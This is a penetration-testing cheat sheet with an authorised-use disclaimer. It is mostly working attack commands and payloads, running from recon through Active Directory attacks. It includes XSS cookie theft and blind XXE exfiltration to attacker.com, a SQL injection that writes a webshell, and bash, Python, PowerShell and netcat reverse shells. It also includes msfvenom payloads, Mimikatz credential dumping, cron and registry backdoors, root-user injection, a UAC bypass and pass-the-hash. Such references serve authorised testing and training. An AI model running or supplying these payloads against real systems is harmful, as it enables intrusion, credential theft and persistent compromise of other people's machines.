Disclaimer: This cheatsheet is for authorised penetration testing and educational purposes only. Never use these techniques against systems you do not own or have explicit written permission to test.
Table of Contents
- OSINT & Recon
- Google Dorks
- Scanning & Enumeration
- Web Exploitation
- Network Exploitation
- Password Attacks
- Post Exploitation
- Privilege Escalation — Linux
- Privilege Escalation — Windows
- Active Directory
- Pivoting & Tunnelling
OSINT & Recon
Passive DNS & Domain Recon
# WHOIS lookup — registrar, registration dates, contact info
whois target.com
# DNS enumeration — A, MX, NS, TXT records
dig target.com ANY
dig target.com MX
dig target.com TXT
# Reverse DNS lookup
dig -x 192.168.1.1
# Zone transfer attempt (often fails but always worth trying)
dig axfr @ns1.target.com target.com
# DNSrecon — comprehensive DNS enumeration
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr # zone transfer
dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt # brute force
Subdomain Enumeration
# Sublist3r — passive subdomain enumeration via OSINT sources
sublist3r -d target.com
sublist3r -d target.com -o subdomains.txt
# Amass — thorough subdomain discovery
amass enum -d target.com
amass enum -active -d target.com -o amass_out.txt
# assetfinder — fast passive recon
assetfinder --subs-only target.com
# crt.sh — certificate transparency logs (browser or curl)
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sort -u
# Subfinder
subfinder -d target.com -o subfinder_out.txt
# Brute force subdomains with ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://FUZZ.target.com -mc 200,301,302
Email & Employee Recon
# theHarvester — emails, subdomains, hosts from public sources
theHarvester -d target.com -b all
theHarvester -d target.com -b google,linkedin,shodan
# Hunter.io (browser) — email format discovery
# https://hunter.io/search/target.com
# LinkedIn recon via Google
# site:linkedin.com "target company" "engineer"
Shodan & Censys
# Shodan CLI
shodan search 'org:"Target Company"'
shodan search 'hostname:target.com'
shodan search 'ssl.cert.subject.cn:target.com'
shodan host 192.168.1.1 # detailed host info
# Common Shodan filters
# port:22 org:"Target"
# product:"Apache httpd" country:"GB"
# http.title:"Dashboard" org:"Target"
Wayback Machine & Historical Recon
# gau — fetch all known URLs for a domain
gau target.com
gau target.com | grep "\.js$" # JavaScript files
gau target.com | grep "\.php$" # PHP endpoints
# waybackurls
waybackurls target.com | tee wayback.txt
# Check robots.txt and sitemap
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
Google Dorks
# Find login portals
site:target.com inurl:login
site:target.com inurl:admin
site:target.com intitle:"Login"
# Exposed files
site:target.com ext:pdf
site:target.com ext:xls OR ext:xlsx
site:target.com ext:sql
site:target.com ext:log
site:target.com ext:bak OR ext:backup
site:target.com ext:env
site:target.com ext:config
# Directory listings
site:target.com intitle:"index of"
site:target.com intitle:"index of /" "parent directory"
# Sensitive info exposure
site:target.com "password" filetype:log
site:target.com "DB_PASSWORD" ext:env
site:target.com intext:"api_key" OR intext:"api key"
# Config and source files
site:target.com ext:xml intext:"password"
site:target.com filetype:conf
site:target.com filetype:ini
# GitHub/Pastebin leaks
site:github.com "target.com" password
site:pastebin.com "target.com"
# Error messages (reveals tech stack)
site:target.com "SQL syntax"
site:target.com "Warning: mysql_"
site:target.com "Uncaught exception"
# Webcams / open devices
inurl:/view/index.shtml # Axis cameras
intitle:"webcamXP 5"
intitle:"D-Link" inurl:8080
# Juicy combos
intitle:"admin panel" site:target.com
inurl:"phpinfo.php" site:target.com
inurl:"/wp-admin/" site:target.com
Scanning & Enumeration
Nmap
# Quick scan — top 1000 ports
nmap -sV -sC 10.10.10.1
# Full port scan
nmap -p- 10.10.10.1
# Stealth scan with OS detection — good all-rounder
nmap -sS -sV -O -Pn 10.10.10.1
# Aggressive scan (noisy but thorough)
nmap -A 10.10.10.1
# UDP scan (slow but reveals SNMP, DNS, etc.)
nmap -sU -top-ports 100 10.10.10.1
# Scan a subnet
nmap -sn 10.10.10.0/24 # ping sweep
nmap -sV 10.10.10.0/24
# Output to all formats
nmap -sV -oA scan_results 10.10.10.1
# Script scan — run default scripts
nmap -sC 10.10.10.1
# Run a specific script
nmap --script=http-enum 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1
nmap --script=ftp-anon 10.10.10.1
# Firewall evasion
nmap -f 10.10.10.1 # fragment packets
nmap -D RND:10 10.10.10.1 # decoy scan
nmap --source-port 53 10.10.10.1 # spoof source port
Service-Specific Enumeration
FTP (21)
# Anonymous login attempt
ftp 10.10.10.1
# Username: anonymous, Password: (blank or email)
# Nmap script
nmap --script=ftp-anon,ftp-bounce,ftp-syst 10.10.10.1
# Brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.1
SSH (22)
# Banner grab
nc -v 10.10.10.1 22
# Enumerate supported auth methods
ssh -v user@10.10.10.1
# Brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P passwords.txt ssh://10.10.10.1
# SSH with key
ssh -i id_rsa user@10.10.10.1
SMTP (25)
# Connect and enumerate users (VRFY/EXPN)
nc -v 10.10.10.1 25
VRFY root
EXPN admin
# smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t 10.10.10.1
DNS (53)
# Zone transfer
dig axfr @10.10.10.1 target.com
# Reverse lookup
dig -x 10.10.10.1 @10.10.10.1
# Brute force subdomains
dnsenum --dnsserver 10.10.10.1 --enum target.com
SMB (139/445)
# Enumerate shares (null session)
smbclient -L //10.10.10.1 -N
smbmap -H 10.10.10.1
# Connect to a share
smbclient //10.10.10.1/share -N
smbclient //10.10.10.1/share -U username
# Enum4linux — full SMB enumeration
enum4linux -a 10.10.10.1
enum4linux-ng -A 10.10.10.1
# Nmap SMB scripts
nmap --script=smb-enum-shares,smb-enum-users 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1 # check for EternalBlue etc.
# CrackMapExec
crackmapexec smb 10.10.10.1
crackmapexec smb 10.10.10.1 -u user -p password --shares
SNMP (161 UDP)
# Walk MIB with default community string
snmpwalk -v2c -c public 10.10.10.1
snmpwalk -v1 -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # hostname
# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.10.10.1
# snmp-check — friendlier output
snmp-check 10.10.10.1 -c public
LDAP (389)
# Anonymous bind enumeration
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com"
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com" "(objectClass=*)"
# Authenticated
ldapsearch -x -H ldap://10.10.10.1 -D "cn=admin,dc=target,dc=com" \
-w password -b "dc=target,dc=com"
Web Enumeration
# Directory brute force — ffuf
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://10.10.10.1/FUZZ -mc 200,301,302,403
# gobuster
gobuster dir -u http://10.10.10.1 \
-w /usr/share/seclists/Discovery/Web-Content/common.txt
# feroxbuster — recursive
feroxbuster -u http://10.10.10.1 -w /usr/share/wordlists/dirb/common.txt
# Virtual host enumeration
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.target.com" -u http://10.10.10.1 -mc 200,301
# Technology fingerprinting
whatweb http://10.10.10.1
wappalyzer (browser extension)
# Nikto — web vulnerability scanner
nikto -h http://10.10.10.1
# Parameter fuzzing — find hidden GET parameters
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/page?FUZZ=test -mc 200 -fs <baseline_size>
# Fuzz parameter values
ffuf -w /usr/share/wordlists/rockyou.txt \
-u "http://10.10.10.1/page?id=FUZZ" -mc 200 -fs <baseline_size>
# POST parameter fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/login -X POST -d "FUZZ=test" \
-H "Content-Type: application/x-www-form-urlencoded" -mc 200
# Extension fuzzing — find backup/alternate files
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt \
-u http://10.10.10.1/indexFUZZ -mc 200
# Fuzz with cookies (authenticated)
ffuf -w wordlist.txt -u http://10.10.10.1/FUZZ \
-H "Cookie: session=abc123" -mc 200,301,302
Web Exploitation
SQL Injection
# Manual detection
' OR 1=1-- -
' OR '1'='1
" OR "1"="1
') OR ('1'='1
# sqlmap — automated SQLi
sqlmap -u "http://target.com/page?id=1"
sqlmap -u "http://target.com/page?id=1" --dbs # list databases
sqlmap -u "http://target.com/page?id=1" -D dbname --tables # list tables
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump
# sqlmap with POST request
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# sqlmap with cookies
sqlmap -u "http://target.com/page" --cookie="session=abc123"
# sqlmap with Burp request file
sqlmap -r request.txt
# Boolean-based blind
' AND 1=1-- - # true
' AND 1=2-- - # false
# UNION-based — find column count
' ORDER BY 1-- -
' ORDER BY 2-- - # increment until error
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 1,2,3-- -
# MySQL — read files
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL-- -
# MySQL — write webshell
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
Cross-Site Scripting (XSS)
# Basic reflected XSS
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Cookie stealing payload
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
# Filter bypass
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<iframe src="javascript:alert(1)">
"><script>alert(1)</script>
'><script>alert(1)</script>
# Stored XSS — test in all input fields, comments, profiles
# DOM-based — check URL parameters reflected in JS
File Inclusion
# Local File Inclusion (LFI)
?page=../../../../etc/passwd
?file=....//....//....//etc/passwd # bypass ../ filter
?lang=php://filter/convert.base64-encode/resource=index.php # read PHP source
# LFI → RCE via log poisoning
# 1. Inject PHP into User-Agent header:
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# 2. Include the log file:
?page=/var/log/apache2/access.log&cmd=id
# LFI → RCE via /proc/self/environ
?page=/proc/self/environ&cmd=id
# Remote File Inclusion (RFI)
?page=http://attacker.com/shell.php
# PHP wrappers
?page=php://input # POST PHP code in body
?page=data://text/plain,<?php system('id'); ?>
?page=expect://id
Command Injection
# Basic injection characters
; id
| id
|| id
&& id
`id`
$(id)
# Bypass spaces
{id}
$IFS # Internal Field Separator
cat${IFS}/etc/passwd
cat</etc/passwd
# Bypass blacklists
w'h'o'am'i
w"h"o"am"i
/bin/c?t /etc/passwd # wildcard
$(printf "\x77\x68\x6f\x61\x6d\x69") # hex encoding
SSRF
SSRF (Server-Side Request Forgery) tricks the server into making HTTP requests on your behalf. Look for parameters that accept URLs or hostnames — url=, redirect=, fetch=, src=, path= etc. The goal is to reach internal services the server can talk to but you can’t directly.
# Point the server at itself — access internal-only services
url=http://localhost/admin
url=http://127.0.0.1:22 # probe internal ports (different response = port open)
url=http://127.0.0.1:3306 # MySQL
url=http://127.0.0.1:6379 # Redis — often unauthenticated internally
# Cloud metadata endpoints — high value target on AWS/GCP/Azure
url=http://169.254.169.254/latest/meta-data/ # AWS
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS IAM keys
url=http://metadata.google.internal/computeMetadata/v1/ # GCP
url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure
# Filter bypass — servers often blacklist "127.0.0.1" or "localhost" as strings
url=http://2130706433/ # 127.0.0.1 as decimal integer
url=http://0x7f000001/ # 127.0.0.1 as hex
url=http://127.1/ # shorthand notation
url=http://[::1]/ # IPv6 loopback
url=http://localtest.me/ # DNS resolves to 127.0.0.1
# Internal network pivoting — scan private ranges via the server
url=http://192.168.1.1/ # probe internal hosts
url=http://10.0.0.1:8080/admin # reach internal admin panels
XXE
XXE (XML External Entity Injection) exploits XML parsers that process external entity declarations. When an app accepts XML input — SOAP requests, file uploads, API payloads — and the parser has external entities enabled, you can use it to read local files, probe internal services, or exfiltrate data out-of-band. Look for Content-Type: application/xml or text/xml in requests, and any file upload that accepts XML, SVG, DOCX, or XLSX formats.
<!-- Basic XXE — read a local file. The contents of /etc/passwd are returned
in the response wherever &xxe; is rendered. -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- SSRF via XXE — make the server reach an internal endpoint -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Blind XXE via Out-of-Band (OOB) — when nothing is reflected in the response.
The server fetches your malicious DTD, which instructs it to exfiltrate
file contents to your listener as a DNS/HTTP request. -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfil;</root>
<!-- evil.dtd hosted on attacker server: -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%exfiltrate;
<!-- XXE via file upload — rename a crafted SVG and upload it -->
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>
Network Exploitation
Metasploit
# Start Metasploit
msfconsole
# Search for exploits
search type:exploit platform:windows smb
search type:exploit platform:linux http
# Use a module
use exploit/path/to/module
show options
set RHOSTS 10.10.10.1
set LHOST 10.10.14.5
set LPORT 4444
run
# Common payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Generate shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f powershell
Reverse Shells
# Netcat listener
nc -lvnp 4444
# Bash reverse shell
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP reverse shell
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Netcat reverse shell
nc -e /bin/sh 10.10.14.5 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
# Upgrade shell to fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → reset → export TERM=xterm
Responder — LLMNR/NBT-NS Poisoning
# Start Responder on interface
responder -I eth0 -rdwv
# Captures NTLMv2 hashes — crack with hashcat
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Meterpreter
Once you have a Meterpreter shell via Metasploit, these are the commands you’ll reach for most:
# Core navigation
sysinfo # OS, hostname, architecture
getuid # current user
getpid # current process ID
ps # list running processes
shell # drop into a system shell
# File operations
upload /local/file.exe C:\\Windows\\Temp\\file.exe
download C:\\Users\\user\\Desktop\\flag.txt /tmp/
ls
cd C:\\Users
cat file.txt
# Privilege escalation
getsystem # attempt automatic privesc (token impersonation)
getuid # confirm if now SYSTEM
# Pivoting
run autoroute -s 192.168.1.0/24 # add route to internal subnet
portfwd add -l 8080 -p 80 -r 192.168.1.10 # forward remote port locally
# Post-exploitation modules
run post/windows/gather/hashdump # dump local hashes
run post/multi/recon/local_exploit_suggester # suggest local privesc exploits
run post/windows/manage/migrate # migrate to another process
# Persistence
run post/windows/manage/persistence_exe STARTUP=SCHEDULER
# Background / session management (from msfconsole)
background # background current session
sessions -l # list all sessions
sessions -i 1 # interact with session 1
Password Attacks
Wordlist Generation
# CeWL — custom wordlist from target website
cewl http://target.com -d 3 -m 5 -w wordlist.txt
# Crunch — generate by pattern
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
crunch 6 6 -t @@@@%% -o wordlist.txt # 4 letters + 2 digits
# Mentalist / CUPP — targeted personal wordlists
cupp -i # interactive mode, builds wordlist from personal info
Online Brute Force
# Hydra — versatile online brute forcer
hydra -l admin -P rockyou.txt http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
hydra -l root -P rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P rockyou.txt ftp://10.10.10.1
hydra -l admin -P rockyou.txt 10.10.10.1 smb
# Medusa
medusa -h 10.10.10.1 -u admin -P rockyou.txt -M http -m DIR:/admin
# Burp Suite Intruder — for web login forms with CSRF tokens
Offline Hash Cracking
# Hashcat
hashcat -m 0 hashes.txt rockyou.txt # MD5
hashcat -m 100 hashes.txt rockyou.txt # SHA1
hashcat -m 1800 hashes.txt rockyou.txt # sha512crypt (Linux /etc/shadow)
hashcat -m 1000 hashes.txt rockyou.txt # NTLM
hashcat -m 5600 hashes.txt rockyou.txt # NTLMv2
hashcat -m 13100 hashes.txt rockyou.txt # Kerberoast (TGS)
hashcat -m 18200 hashes.txt rockyou.txt # AS-REP Roasting
# Rules-based cracking
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# John the Ripper
john hashes.txt --wordlist=rockyou.txt
john hashes.txt --wordlist=rockyou.txt --rules
john --format=NT hashes.txt --wordlist=rockyou.txt
# Extract hashes from files
pdf2john file.pdf > hash.txt
zip2john file.zip > hash.txt
ssh2john id_rsa > hash.txt
keepass2john vault.kdbx > hash.txt
Hash Identification
# hashid
hashid 'hash_here'
# haiti
haiti 'hash_here'
# Common hash lengths
# 32 chars → MD5
# 40 chars → SHA1
# 64 chars → SHA256
# $1$ → MD5crypt
# $2a$/$2b$ → bcrypt
# $6$ → sha512crypt
Post Exploitation
Situational Awareness
# Linux — who are we, where are we
id && whoami
hostname
uname -a
cat /etc/os-release
cat /proc/version
env
pwd
ip a
netstat -tulpn
ss -tulpn
ps aux
cat /etc/passwd
cat /etc/hosts
cat /etc/crontab
ls -la /home/
# Windows — situational awareness
whoami
whoami /priv
whoami /groups
hostname
systeminfo
net user
net localgroup administrators
ipconfig /all
netstat -ano
tasklist
wmic product get name,version # installed software
File Transfer
# Python HTTP server (attacker)
python3 -m http.server 80
# Download on Linux target
wget http://10.10.14.5/file.sh
curl http://10.10.14.5/file.sh -o file.sh
# Download on Windows target
certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','file.exe')"
iwr http://10.10.14.5/file.exe -OutFile file.exe # Invoke-WebRequest
# SCP
scp file.txt user@10.10.10.1:/tmp/
scp user@10.10.10.1:/etc/passwd ./passwd
# SMB server (attacker, impacket)
python3 /usr/share/impacket/examples/smbserver.py share . -smb2support
# On Windows target — copy from SMB share
copy \\10.10.14.5\share\file.exe .
Credential Hunting
# Linux — find stored credentials
find / -name "*.conf" 2>/dev/null | xargs grep -l "password"
find / -name "*.env" 2>/dev/null
find / -name "id_rsa" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null
cat ~/.bash_history
cat ~/.ssh/config
grep -r "password" /var/www/ 2>/dev/null
grep -r "DB_PASS" /var/www/ 2>/dev/null
# Windows — credential hunting
dir /s /b *pass* *cred* *vnc* *.config* 2>nul
findstr /si "password" *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # autologon creds
# Dump Windows credentials
# Mimikatz (on target)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # dump plaintext passwords from LSASS
lsadump::sam # dump SAM database
lsadump::secrets
# secretsdump (remote, impacket)
python3 secretsdump.py domain/user:password@10.10.10.1
Database Access
Once you have credentials or a shell, databases are a goldmine for credentials, flags, and pivoting material.
# MySQL
mysql -u root -p # interactive login
mysql -u root -p'password' -e "show databases;" # one-liner
mysql -u root -p -h 10.10.10.1 # remote connection
# MySQL useful commands
show databases;
use dbname;
show tables;
select * from users;
select user,password from mysql.user; # dump MySQL user hashes
select load_file('/etc/passwd'); # read files (if FILE priv)
# MSSQL (via impacket)
python3 mssqlclient.py domain/user:password@10.10.10.1 -windows-auth
python3 mssqlclient.py user:password@10.10.10.1
# MSSQL useful commands
SELECT name FROM master.dbo.sysdatabases; # list databases
USE dbname; SELECT * FROM INFORMATION_SCHEMA.TABLES;
EXEC xp_cmdshell 'whoami'; # RCE if enabled
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; # enable xp_cmdshell
# PostgreSQL
psql -U postgres -h 10.10.10.1
psql -U postgres -h 10.10.10.1 -c "\list" # list databases
# PostgreSQL useful commands
\list # list databases
\c dbname # connect to database
\dt # list tables
SELECT * FROM users;
COPY (SELECT '') TO PROGRAM 'id'; # RCE via COPY TO PROGRAM
Cracking /etc/shadow
# If you can read /etc/shadow — combine with /etc/passwd and crack offline
unshadow /etc/passwd /etc/shadow > hashes.txt
# Crack with John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Crack with hashcat — identify mode first
hashid '$6$salt$hash...' # $6$ = sha512crypt, mode 1800
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt # $1$ md5crypt
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt # $2b$ bcrypt
# Linux — cron job backdoor
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" >> /etc/crontab
# Linux — SSH key persistence
mkdir ~/.ssh && echo "ssh-rsa AAAA...yourkey..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Windows — registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\backdoor.exe"
# Windows — scheduled task
schtasks /create /tn "backdoor" /tr "C:\backdoor.exe" /sc onlogon /ru System
Privilege Escalation — Linux
Automated Enumeration
# LinPEAS — comprehensive Linux privesc enumeration
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
# Linux Exploit Suggester
./linux-exploit-suggester.sh
# linux-smart-enumeration
./lse.sh -l 2 # level 2 — thorough
SUID / SGID Binaries
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check GTFOBins for exploitation — https://gtfobins.github.io
# Common exploitable SUID binaries:
# /usr/bin/find → find . -exec /bin/sh \; -quit
# /usr/bin/vim → vim -c ':py import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'
# /usr/bin/nmap → nmap --interactive → !sh
# /bin/bash → bash -p
# /usr/bin/python → python -c 'import os; os.execl("/bin/sh","sh")'
Sudo
# Check sudo permissions
sudo -l
# If (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
# If (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/bash \; -quit
# If (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import os; os.system("/bin/bash")'
# If (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd → !bash
# sudo -l shows env_keep+=LD_PRELOAD
# Create malicious shared library:
cat > /tmp/pe.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so <any_sudo_binary>
Cron Jobs
# View cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# If a cron script is world-writable:
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" >> /path/to/script.sh
# If a cron uses a relative path (PATH hijack):
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
Capabilities
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities:
# cap_setuid — change UID to root
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_net_raw — raw socket access (useful for sniffing)
# cap_sys_admin — broad system administration
# perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Writable /etc/passwd
# If /etc/passwd is writable, add a root user
# Generate password hash
openssl passwd -1 -salt xyz hacker
# Append to /etc/passwd
echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
Kernel Exploits
# Check kernel version
uname -r
cat /proc/version
# DirtyCow (CVE-2016-5195) — Linux 2.6.22 < 3.9
# DirtyPipe (CVE-2022-0847) — Linux 5.8 ≤ 5.16.11
# PwnKit (CVE-2021-4034) — polkit pkexec
# linux-exploit-suggester will map kernel version to known exploits
./linux-exploit-suggester.sh | grep -i "high"
Privilege Escalation — Windows
Automated Enumeration
# WinPEAS
.\winpeas.exe
# PowerUp (PowerSploit)
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt — security-focused enumeration
.\Seatbelt.exe -group=all
# SharpUp
.\SharpUp.exe audit
Service Exploits
# Find services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -ucqv <service_name> /accepteula
# Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# If path is: C:\Program Files\Vulnerable App\service.exe
# Drop payload at: C:\Program.exe or C:\Program Files\Vulnerable.exe
# Weak service binary permissions
# Replace the service binary with your payload, restart the service
sc stop <service>
sc start <service>
Registry
# AlwaysInstallElevated — installs MSI as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both = 1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
# Stored credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s # PuTTY creds
Token Impersonation
# Check privileges
whoami /priv
# SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
# → PrintSpoofer, RoguePotato, JuicyPotato
# PrintSpoofer (Windows 10 / Server 2019)
.\PrintSpoofer.exe -i -c cmd
# RoguePotato
.\RoguePotato.exe -r 10.10.14.5 -e "cmd.exe" -l 9999
# JuicyPotato (older Windows)
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
UAC Bypass
# Check UAC level
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
# fodhelper bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Pass the Hash
# psexec with NTLM hash (no plaintext password needed)
python3 psexec.py administrator@10.10.10.1 -hashes :NTLM_HASH
# CrackMapExec PTH
crackmapexec smb 10.10.10.1 -u administrator -H NTLM_HASH
crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH # spray subnet
# Evil-WinRM PTH
evil-winrm -i 10.10.10.1 -u administrator -H NTLM_HASH
Active Directory
Initial Enumeration
# BloodHound — AD attack path visualisation
# Collect data with SharpHound (on Windows)
.\SharpHound.exe -c All
# Or BloodHound.py (from Linux)
python3 bloodhound.py -u user -p password -d domain.local -dc 10.10.10.1 -c All
# Enum4linux-ng
enum4linux-ng -A 10.10.10.1
# CrackMapExec — AD enumeration
crackmapexec smb 10.10.10.1 -u user -p password --users
crackmapexec smb 10.10.10.1 -u user -p password --groups
crackmapexec smb 10.10.10.1 -u user -p password --shares
crackmapexec smb 10.10.10.1 -u user -p password --pass-pol # password policy
# LDAP enumeration with ldapdomaindump
python3 ldapdomaindump.py -u 'domain\user' -p password 10.10.10.1
Kerberoasting
# Request TGS tickets for service accounts — crack offline
# Impacket
python3 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 -request
# PowerView (on Windows)
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv tickets.csv
# Crack with hashcat
